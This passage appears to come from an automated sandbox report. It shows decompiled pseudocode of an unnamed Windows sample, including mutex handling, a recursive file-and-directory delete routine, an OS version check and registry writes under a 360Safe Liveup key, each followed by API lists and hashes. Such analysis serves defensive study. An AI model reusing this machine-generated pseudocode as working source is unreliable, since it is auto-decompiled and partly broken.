					} else {
						 *0xd68dcc = _t32;
					}
					 *((intOrPtr*)(_t32 + 0x5bc)) =  *((intOrPtr*)(_t32 + 0x5bc)) + 1;
					 *(_t58 - 4) = 0xffffffff;
					ReleaseMutex(_t56);
					if(_t53 == 0) {
						CloseHandle(_t56);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				_pop(_t54);
				_pop(_t57);
				_pop(_t44);
				return E00D0071A(0xd68dcc, _t44,  *(_t58 + 0x84) ^ _t58, _t51, _t54, _t57);
			}





















                                                                                                                                                                                          0x00c89990
                                                                                                                                                                                          0x00c89991
                                                                                                                                                                                          0x00c8999e
                                                                                                                                                                                          0x00c899a0
                                                                                                                                                                                          0x00c899ab
                                                                                                                                                                                          0x00c899af
                                                                                                                                                                                          0x00c899b4
                                                                                                                                                                                          0x00c899b6
                                                                                                                                                                                          0x00c899bf
                                                                                                                                                                                          0x00c899c3
                                                                                                                                                                                          0x00c899c9
                                                                                                                                                                                          0x00c899cc
                                                                                                                                                                                          0x00c899dc
                                                                                                                                                                                          0x00c899ec
                                                                                                                                                                                          0x00c899ef
                                                                                                                                                                                          0x00c899f9
                                                                                                                                                                                          0x00c89a00
                                                                                                                                                                                          0x00c89a02
                                                                                                                                                                                          0x00c89a0c
                                                                                                                                                                                          0x00c89a12
                                                                                                                                                                                          0x00c89a14
                                                                                                                                                                                          0x00c89a19
                                                                                                                                                                                          0x00c89a2a
                                                                                                                                                                                          0x00c89a2f
                                                                                                                                                                                          0x00c89a2f
                                                                                                                                                                                          0x00c89a35
                                                                                                                                                                                          0x00c89a3c
                                                                                                                                                                                          0x00c89a43
                                                                                                                                                                                          0x00c89a4c
                                                                                                                                                                                          0x00c89a51
                                                                                                                                                                                          0x00c89a54
                                                                                                                                                                                          0x00c89a57
                                                                                                                                                                                          0x00c89a59
                                                                                                                                                                                          0x00c89a64
                                                                                                                                                                                          0x00c89a64
                                                                                                                                                                                          0x00c89a5b
                                                                                                                                                                                          0x00c89a5d
                                                                                                                                                                                          0x00c89a5d
                                                                                                                                                                                          0x00c89a66
                                                                                                                                                                                          0x00c89a6a
                                                                                                                                                                                          0x00c89a6f
                                                                                                                                                                                          0x00c89a71
                                                                                                                                                                                          0x00c89a73
                                                                                                                                                                                          0x00c89a7b
                                                                                                                                                                                          0x00c89a7f
                                                                                                                                                                                          0x00c89a7f
                                                                                                                                                                                          0x00c89a84
                                                                                                                                                                                          0x00c89a86
                                                                                                                                                                                          0x00c89a8a
                                                                                                                                                                                          0x00c89a92
                                                                                                                                                                                          0x00c89a94
                                                                                                                                                                                          0x00c89a96
                                                                                                                                                                                          0x00c89aa6
                                                                                                                                                                                          0x00c89aa6
                                                                                                                                                                                          0x00c89aab
                                                                                                                                                                                          0x00c89a45
                                                                                                                                                                                          0x00c89a45
                                                                                                                                                                                          0x00c89a45
                                                                                                                                                                                          0x00c89ab0
                                                                                                                                                                                          0x00c89ab6
                                                                                                                                                                                          0x00c89abe
                                                                                                                                                                                          0x00c89ac6
                                                                                                                                                                                          0x00c89ac9
                                                                                                                                                                                          0x00c89ac9
                                                                                                                                                                                          0x00c89ac6
                                                                                                                                                                                          0x00c89ad7
                                                                                                                                                                                          0x00c89adf
                                                                                                                                                                                          0x00c89ae0
                                                                                                                                                                                          0x00c89ae1
                                                                                                                                                                                          0x00c89af8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(8A9E1774,?,?,?,?,?,?,?,00D38A4B,000000FF), ref: 00C899D6
                                                                                                                                                                                            • Part of subcall function 00C895F0: _vswprintf_s.LIBCMT ref: 00C8961A
                                                                                                                                                                                          • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,00D38A4B,000000FF), ref: 00C89A0C
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00D38A4B,000000FF), ref: 00C89A1F
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,00D38A4B,000000FF), ref: 00C89A2F
                                                                                                                                                                                            • Part of subcall function 00C89FA0: GetProcessHeap.KERNEL32(00000000,00C89A51,?,?,?,?,?,?,?,?,00D38A4B,000000FF), ref: 00C89FA3
                                                                                                                                                                                            • Part of subcall function 00C89FA0: HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,00D38A4B,000000FF), ref: 00C89FB4
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00C89A7F
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00C89AA6
                                                                                                                                                                                            • Part of subcall function 00C89DE0: _memset.LIBCMT ref: 00C89E27
                                                                                                                                                                                            • Part of subcall function 00C89DE0: TlsAlloc.KERNEL32 ref: 00C89E53
                                                                                                                                                                                            • Part of subcall function 00C89DE0: __CxxThrowException@8.LIBCMT ref: 00C89E73
                                                                                                                                                                                          • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D38A4B,000000FF), ref: 00C89ABE
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D38A4B,000000FF), ref: 00C89AC9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Exception@8Throw$AllocHeapMutexProcess$CloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_memset_vswprintf_s
                                                                                                                                                                                          • String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                                                                                                                                                                          • API String ID: 996444115-332789905
                                                                                                                                                                                          • Opcode ID: 460b4da6e08c111f6286f808f8f404d0aeaa30ce953a87c47ad227dcad953132
                                                                                                                                                                                          • Instruction ID: cda4ae682bce05e7b07bf8ede1c8c1d483f5223d26048af057d8c2fbf3744c76
                                                                                                                                                                                          • Opcode Fuzzy Hash: 460b4da6e08c111f6286f808f8f404d0aeaa30ce953a87c47ad227dcad953132
                                                                                                                                                                                          • Instruction Fuzzy Hash: E931D570904305AFCB14EFA9DC45BAE7BB8FB44714F044229E819D7380DB344A08DB75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEF1C5 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 139fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                          			E00CEF1C5(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				short _t42;
				int _t44;
				short _t45;
				void* _t58;
				void* _t60;
				void* _t65;
				WCHAR* _t83;
				void* _t84;
				char* _t85;
				void* _t101;
				void* _t103;
				void* _t107;
				signed int _t109;
				void* _t111;
				void* _t112;
				void* _t114;

				_t101 = __edx;
				_t112 = _t111 - 0x914;
				_t109 = _t112 - 4;
				_t38 =  *0xd64070; // 0x8a9e1774
				 *(_t109 + 0x914) = _t38 ^ _t109;
				_push(0x10);
				E00D0155A(0xd37e48, __ebx, __edi, __esi);
				_t83 =  *(_t109 + 0x920);
				 *((intOrPtr*)(_t109 - 0x18)) = __ecx;
				 *(_t109 - 0x10) = _t83;
				if(_t83 == 0) {
					L11:
					_t42 = 0;
					__eflags = 0;
					L12:
					 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
					_pop(_t103);
					_pop(_t107);
					_pop(_t84);
					return E00D0071A(_t42, _t84,  *(_t109 + 0x914) ^ _t109, _t101, _t103, _t107);
				}
				_t44 = PathFileExistsW(_t83); // executed
				_t117 = _t44;
				if(_t44 == 0) {
					goto L11;
				}
				_t45 = 0x5c;
				 *((short*)(_t109 + 0x458)) = _t45;
				 *((intOrPtr*)(_t109 + 0x45c)) = 0;
				 *((intOrPtr*)(_t109 + 0x460)) = 0;
				 *((short*)(_t109 + 0x5f4)) = 0;
				 *((intOrPtr*)(_t109 - 4)) = 0;
				E00D006A0(0x18e, _t109 + 0x5f6, 0, 0x18e);
				E00CC6919(_t109 + 0x5f4, 0x190, L"%s\\*.*", _t83);
				_t114 = _t112 + 0x1c;
				if(E00CDCF38(_t109, 0x18e, _t117, _t109 + 0x5f4) == 0) {
					L10:
					E00CDC813(_t109);
					RemoveDirectoryW(_t83);
					E00CDC813(_t109);
					_t42 = 1;
					goto L12;
				}
				_t85 = L"%s\\%s";
				do {
					 *((intOrPtr*)(_t109 - 0x14)) = E00CDC7EC(_t109);
					_t58 = E00CDCEFB(_t109);
					_t119 = _t58;
					if(_t58 == 0) {
						_push(_t109 - 0x1c);
						_t60 = E00CDE1F1(_t85, _t109, 0x18e, 0x190, _t119);
						_push(0xc8);
						 *((char*)(_t109 - 4)) = 1;
						E00C8E570(_t109 + 0x464, 0x190, E00C99832(_t60, _t101));
						 *((char*)(_t109 - 4)) = 0;
						E00C9820F(_t109 - 0x1c);
						_t65 = E00CDC7C8(_t109, 0x10);
						_push(0x18e);
						_push(0);
						_t120 = _t65;
						if(_t65 == 0) {
							__eflags = 0;
							 *(_t109 + 0x784) = 0;
							_push(_t109 + 0x786);
							E00D006A0(0x18e);
							_push(_t109 + 0x464);
							E00CC6919(_t109 + 0x784, 0x190, _t85,  *(_t109 - 0x10));
							_t114 = _t114 + 0x20;
							DeleteFileW(_t109 + 0x784);
						} else {
							 *(_t109 + 0x784) = 0;
							_push(_t109 + 0x786);
							E00D006A0(0x18e);
							_push(_t109 + 0x464);
							E00CC6919(_t109 + 0x784, 0x190, _t85,  *(_t109 - 0x10));
							_t114 = _t114 + 0x20;
							E00CEF1C5(_t85,  *((intOrPtr*)(_t109 - 0x18)), _t101, 0x18e, 0x190, _t120, _t109 + 0x784);
						}
					}
				} while ( *((intOrPtr*)(_t109 - 0x14)) != 0);
				_t83 =  *(_t109 - 0x10);
				goto L10;
			}





















                                                                                                                                                                                          0x00cef1c5
                                                                                                                                                                                          0x00cef1c6
                                                                                                                                                                                          0x00cef1cc
                                                                                                                                                                                          0x00cef1d0
                                                                                                                                                                                          0x00cef1d7
                                                                                                                                                                                          0x00cef1dd
                                                                                                                                                                                          0x00cef1e4
                                                                                                                                                                                          0x00cef1e9
                                                                                                                                                                                          0x00cef1f1
                                                                                                                                                                                          0x00cef1f4
                                                                                                                                                                                          0x00cef1f9
                                                                                                                                                                                          0x00cef381
                                                                                                                                                                                          0x00cef381
                                                                                                                                                                                          0x00cef381
                                                                                                                                                                                          0x00cef383
                                                                                                                                                                                          0x00cef386
                                                                                                                                                                                          0x00cef38e
                                                                                                                                                                                          0x00cef38f
                                                                                                                                                                                          0x00cef390
                                                                                                                                                                                          0x00cef3a5
                                                                                                                                                                                          0x00cef3a5
                                                                                                                                                                                          0x00cef200
                                                                                                                                                                                          0x00cef206
                                                                                                                                                                                          0x00cef208
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cef210
                                                                                                                                                                                          0x00cef211
                                                                                                                                                                                          0x00cef218
                                                                                                                                                                                          0x00cef21e
                                                                                                                                                                                          0x00cef22c
                                                                                                                                                                                          0x00cef23b
                                                                                                                                                                                          0x00cef23e
                                                                                                                                                                                          0x00cef254
                                                                                                                                                                                          0x00cef259
                                                                                                                                                                                          0x00cef26d
                                                                                                                                                                                          0x00cef365
                                                                                                                                                                                          0x00cef368
                                                                                                                                                                                          0x00cef36e
                                                                                                                                                                                          0x00cef377
                                                                                                                                                                                          0x00cef37e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cef37e
                                                                                                                                                                                          0x00cef273
                                                                                                                                                                                          0x00cef278
                                                                                                                                                                                          0x00cef283
                                                                                                                                                                                          0x00cef286
                                                                                                                                                                                          0x00cef28b
                                                                                                                                                                                          0x00cef28d
                                                                                                                                                                                          0x00cef296
                                                                                                                                                                                          0x00cef29a
                                                                                                                                                                                          0x00cef29f
                                                                                                                                                                                          0x00cef2a6
                                                                                                                                                                                          0x00cef2b8
                                                                                                                                                                                          0x00cef2c0
                                                                                                                                                                                          0x00cef2c4
                                                                                                                                                                                          0x00cef2ce
                                                                                                                                                                                          0x00cef2d3
                                                                                                                                                                                          0x00cef2d4
                                                                                                                                                                                          0x00cef2d6
                                                                                                                                                                                          0x00cef2d8
                                                                                                                                                                                          0x00cef31b
                                                                                                                                                                                          0x00cef31d
                                                                                                                                                                                          0x00cef32a
                                                                                                                                                                                          0x00cef32b
                                                                                                                                                                                          0x00cef336
                                                                                                                                                                                          0x00cef343
                                                                                                                                                                                          0x00cef348
                                                                                                                                                                                          0x00cef352
                                                                                                                                                                                          0x00cef2da
                                                                                                                                                                                          0x00cef2dc
                                                                                                                                                                                          0x00cef2e9
                                                                                                                                                                                          0x00cef2ea
                                                                                                                                                                                          0x00cef2f5
                                                                                                                                                                                          0x00cef302
                                                                                                                                                                                          0x00cef30a
                                                                                                                                                                                          0x00cef314
                                                                                                                                                                                          0x00cef314
                                                                                                                                                                                          0x00cef2d8
                                                                                                                                                                                          0x00cef358
                                                                                                                                                                                          0x00cef362
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CEF1E4
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?,00000010), ref: 00CEF200
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CEF23E
                                                                                                                                                                                            • Part of subcall function 00CC6919: _vswprintf_s.LIBCMT ref: 00CC694C
                                                                                                                                                                                            • Part of subcall function 00CDCF38: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00CDCF64
                                                                                                                                                                                            • Part of subcall function 00CDCF38: GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00CDCF81
                                                                                                                                                                                            • Part of subcall function 00CDCF38: SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00CDCF94
                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,?), ref: 00CEF36E
                                                                                                                                                                                            • Part of subcall function 00CDE1F1: __EH_prolog3.LIBCMT ref: 00CDE1F8
                                                                                                                                                                                            • Part of subcall function 00C9820F: InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CEF2EA
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CEF32B
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000010,?,?), ref: 00CEF352
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File_memset$H_prolog3Path$DecrementDeleteDirectoryErrorExistsFindFirstFullInterlockedLastNameRemove_vswprintf_s
                                                                                                                                                                                          • String ID: %s\%s$%s\*.*
                                                                                                                                                                                          • API String ID: 3188356844-1665845743
                                                                                                                                                                                          • Opcode ID: c7237138271e15f2b454fce9016ef0ac134970c42a034750be624c39ac5b7b74
                                                                                                                                                                                          • Instruction ID: c70ddf9b39e444403c5d4bfca63b2447551b690913975a0f5660e843cdba7bdd
                                                                                                                                                                                          • Opcode Fuzzy Hash: c7237138271e15f2b454fce9016ef0ac134970c42a034750be624c39ac5b7b74
                                                                                                                                                                                          • Instruction Fuzzy Hash: 51512E7194028EAEDF20EFA5CD85BEE77ACEF04304F40442AA909D7192EB74A705DB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CE7843 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 492 ce7843-ce7891 call d006a0 * 2 GetVersionExW 497 ce78a4-ce78bd GetModuleHandleW GetProcAddress 492->497 498 ce7893-ce78a2 GetVersionExW 492->498 499 ce78d8 497->499 500 ce78bf-ce78ca GetNativeSystemInfo 497->500 498->497 498->499 503 ce78da-ce78ef call d0071a 499->503 501 ce78cc-ce78d1 500->501 502 ce78d3-ce78d6 500->502 501->499 501->502 502->503
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E00CE7843(void* __ebx, void* __eflags) {
				void* __esi;
				signed int _t13;
				_Unknown_base(*)()* _t22;
				void* _t23;
				void* _t29;
				void* _t33;
				void* _t34;
				void* _t38;
				signed int _t39;
				void* _t41;

				_t29 = __ebx;
				_t39 = _t41 - 0xc4;
				_t13 =  *0xd64070; // 0x8a9e1774
				 *(_t39 + 0xc0) = _t13 ^ _t39;
				E00D006A0(_t34, _t39 - 0x80, 0, 0x24);
				E00D006A0(_t34, _t39 - 0x5c, 0, 0x11c);
				 *(_t39 - 0x5c) = 0x11c;
				if(GetVersionExW(_t39 - 0x5c) != 0) {
					L2:
					_t22 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetNativeSystemInfo");
					if(_t22 == 0) {
						goto L6;
					} else {
						 *_t22(_t39 - 0x80); // executed
						if( *((short*)(_t39 - 0x80)) == 9 ||  *((short*)(_t39 - 0x80)) == 6) {
							_t23 = 1;
						} else {
							goto L6;
						}
					}
				} else {
					 *(_t39 - 0x5c) = 0x114;
					if(GetVersionExW(_t39 - 0x5c) == 0) {
						L6:
						_t23 = 0;
					} else {
						goto L2;
					}
				}
				_pop(_t38);
				return E00D0071A(_t23, _t29,  *(_t39 + 0xc0) ^ _t39, _t33, _t34, _t38);
			}













                                                                                                                                                                                          0x00ce7843
                                                                                                                                                                                          0x00ce7844
                                                                                                                                                                                          0x00ce7851
                                                                                                                                                                                          0x00ce7858
                                                                                                                                                                                          0x00ce7867
                                                                                                                                                                                          0x00ce7878
                                                                                                                                                                                          0x00ce7883
                                                                                                                                                                                          0x00ce7891
                                                                                                                                                                                          0x00ce78a4
                                                                                                                                                                                          0x00ce78b5
                                                                                                                                                                                          0x00ce78bd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce78bf
                                                                                                                                                                                          0x00ce78c3
                                                                                                                                                                                          0x00ce78ca
                                                                                                                                                                                          0x00ce78d5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce78ca
                                                                                                                                                                                          0x00ce7893
                                                                                                                                                                                          0x00ce7897
                                                                                                                                                                                          0x00ce78a2
                                                                                                                                                                                          0x00ce78d8
                                                                                                                                                                                          0x00ce78d8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce78a2
                                                                                                                                                                                          0x00ce78e2
                                                                                                                                                                                          0x00ce78ef

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE7867
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE7878
                                                                                                                                                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00CE788D
                                                                                                                                                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00CE789E
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?), ref: 00CE78AE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00CE78B5
                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?), ref: 00CE78C3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Version_memset$AddressHandleInfoModuleNativeProcSystem
                                                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                          • API String ID: 675204089-192647395
                                                                                                                                                                                          • Opcode ID: ae64cc482a1987e9e12c860dd5e26f603b6b484fb2b272b08270409172378396
                                                                                                                                                                                          • Instruction ID: 5a3be80ed03eef09dd7aa5e025fb2f08cc97c83468abf48bc4e6a0c530e9cb68
                                                                                                                                                                                          • Opcode Fuzzy Hash: ae64cc482a1987e9e12c860dd5e26f603b6b484fb2b272b08270409172378396
                                                                                                                                                                                          • Instruction Fuzzy Hash: 90114C71E002589AEB20EBE99D09BDE7BA8AF54704F404529E615E71C0EB749609CB71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFF270 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 506 cff270-cff2bc call d006a0 call cfe1a0 511 cff2c0-cff2c8 506->511 512 cff2db-cff2dd 511->512 513 cff2ca-cff2cf 511->513 515 cff2df 512->515 516 cff2e0-cff358 call c970c0 call d006a0 SHSetValueA 512->516 513->512 514 cff2d1-cff2d7 513->514 514->511 517 cff2d9 514->517 515->516 522 cff3bb-cff3c2 516->522 523 cff35a-cff35c 516->523 517->515 525 cff3c5-cff3ca 522->525 524 cff363-cff367 523->524 526 cff369-cff36b 524->526 527 cff383-cff385 524->527 525->525 528 cff3cc-cff3f5 SHSetValueA call d0071a 525->528 530 cff37f-cff381 526->530 531 cff36d-cff373 526->531 532 cff388-cff38a 527->532 533 cff3fa-cff400 528->533 530->532 531->527 534 cff375-cff37d 531->534 532->522 535 cff38c-cff393 532->535 534->524 534->530 536 cff396-cff39b 535->536 536->536 537 cff39d-cff3b9 SHSetValueA 536->537 537->522
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E00CFF270(intOrPtr* __edi, void* __eflags) {
				signed int _v4;
				signed int _v44;
				char _v264;
				void _v284;
				char _v531;
				void _v532;
				void _v540;
				char _v648;
				void* _v664;
				void* _v668;
				void* __ebx;
				void* __esi;
				signed int _t26;
				char* _t31;
				int _t36;
				intOrPtr* _t37;
				int _t40;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr _t52;
				intOrPtr* _t55;
				intOrPtr _t56;
				char _t57;
				void* _t59;
				void* _t62;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t66;
				intOrPtr* _t67;
				void* _t68;
				intOrPtr _t69;
				signed int _t70;
				void* _t71;
				signed int _t72;
				void* _t73;

				_t73 = __eflags;
				_t67 = __edi;
				_t26 =  *0xd64070; // 0x8a9e1774
				_v4 = _t26 ^ _t70;
				E00D006A0(__edi,  &_v648, 0, 0x80);
				_t46 =  &_v648;
				E00CFE1A0( &_v648, _t67, _t73, 0x80);
				_t31 =  &_v264;
				_t71 = _t70 + 0x10;
				_t68 = 0x104;
				_t59 = _t67 - _t31;
				while(1) {
					_t5 = _t68 + 0x7ffffefa; // 0x7ffffffe
					if(_t5 == 0) {
						break;
					}
					_t57 =  *((intOrPtr*)(_t59 + _t31));
					if(_t57 == 0) {
						break;
					} else {
						 *_t31 = _t57;
						_t31 = _t31 + 1;
						_t68 = _t68 - 1;
						if(_t68 != 0) {
							continue;
						} else {
							L6:
							_t31 = _t31 - 1;
						}
					}
					L7:
					 *_t31 = 0;
					E00C970C0(_t67,  &_v264, 0x104,  &_v648);
					_v664 = 1;
					_v532 = 0;
					E00D006A0(_t67,  &_v531, 0, 0xff);
					_t72 = _t71 + 0xc;
					_v668 = 0x100;
					_t36 = SHSetValueA(0x80000002, "Software\\360Safe\\Liveup", "mid",  &_v664,  &_v532,  &_v668);
					_t69 = __imp__SHSetValueA; // 0x76ecf2f0
					if(_t36 == 0) {
						_t55 = _t67;
						_t42 =  &_v540;
						while(1) {
							_t63 =  *_t42;
							if(_t63 !=  *_t55) {
								break;
							}
							if(_t63 == 0) {
								L13:
								_t42 = 0;
							} else {
								_t66 =  *((intOrPtr*)(_t42 + 1));
								if(_t66 !=  *((intOrPtr*)(_t55 + 1))) {
									break;
								} else {
									_t42 = _t42 + 2;
									_t55 = _t55 + 2;
									if(_t66 != 0) {
										continue;
									} else {
										goto L13;
									}
								}
							}
							L15:
							if(_t42 != 0) {
								_t43 =  &_v540;
								_t64 = _t43 + 1;
								do {
									_t56 =  *_t43;
									_t43 = _t43 + 1;
								} while (_t56 != 0);
								SHSetValueA(0x80000002, "Software\\360Safe\\Liveup", "mid_old", 1,  &_v540, _t43 - _t64);
							}
							goto L19;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L15;
					}
					L19:
					_t37 =  &_v284;
					_t62 = _t37 + 1;
					do {
						_t52 =  *_t37;
						_t37 = _t37 + 1;
					} while (_t52 != 0);
					_t40 = SHSetValueA(0x80000002, "Software\\360Safe\\Liveup", "mid", 1,  &_v284, _t37 - _t62); // executed
					return E00D0071A(_t40, _t46, _v44 ^ _t72, _t62, _t67, _t69);
				}
				__eflags = _t68;
				if(_t68 == 0) {
					goto L6;
				}
				goto L7;
			}






































                                                                                                                                                                                          0x00cff270
                                                                                                                                                                                          0x00cff270
                                                                                                                                                                                          0x00cff276
                                                                                                                                                                                          0x00cff27d
                                                                                                                                                                                          0x00cff292
                                                                                                                                                                                          0x00cff29c
                                                                                                                                                                                          0x00cff2a2
                                                                                                                                                                                          0x00cff2a7
